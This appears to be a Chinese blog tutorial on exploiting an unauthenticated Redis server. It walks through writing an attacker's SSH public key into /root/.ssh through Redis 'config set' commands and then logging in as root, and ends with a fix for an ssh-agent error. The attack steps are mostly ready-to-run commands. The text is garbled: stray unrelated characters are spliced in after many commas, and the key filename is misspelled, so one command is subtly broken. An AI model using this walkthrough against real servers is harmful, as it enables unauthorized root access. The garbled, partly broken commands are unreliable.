0x01 漏洞簡介
Redis服務(wù)器默認(rèn)綁定在0.0.0.0:6379谍失,這會導(dǎo)致redis暴露在公網(wǎng)上,在未經(jīng)過認(rèn)證的情況下营曼,任何人都可以進(jìn)行登錄帝牡。攻擊者可以通過向redis上寫入公鑰,再利用私鑰進(jìn)行登錄。
利用redis的config命令洪乍,可以向服務(wù)器上寫文件眯杏,攻擊者通過將自己的公鑰寫入到服務(wù)器的/root/.ssh文件夾下的authroized_key文件中,即可成功登錄到目標(biāo)服務(wù)器典尾。
0x02 漏洞復(fù)現(xiàn)
首先役拴,生成自己的公鑰和私鑰
ssh-keygen -t rsa
會在/root/.ssh下生成id_rsa(私鑰)、id_rsa.pub(公鑰)
然后將公鑰寫入到一個txt中
(echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n") > pino.txt
之后將該文件的內(nèi)容通過redis的config命令寫入到服務(wù)器上
cat pino.txt|redis-cli -h 192.168.3.55 -x set pino
redis-cli -h 192.168.3.55
>config set dir /root/.ssh
>config set dbfilename "authroized_keys"
>save
>exit
process
到目前為止我們已經(jīng)把自己的公鑰上傳到了服務(wù)器上了钾埂,這個時候就可以通過私鑰來進(jìn)行ssh登錄了河闰。
ssh -i id_rsa root@192.168.3.55
就可以成功登錄到服務(wù)器了。
finish
0x02 遇到的問題及解決方案
如果之前一切順利后卻發(fā)現(xiàn)最后一步ssh登錄報錯了褥紫,如下:
sign_and_send_pubkey: signing failed: agent refused operation
可以通過
eval "$(ssh-agent -s)"
ssh-add
解決
error
如果還有什么問題姜性,歡迎私信交流~
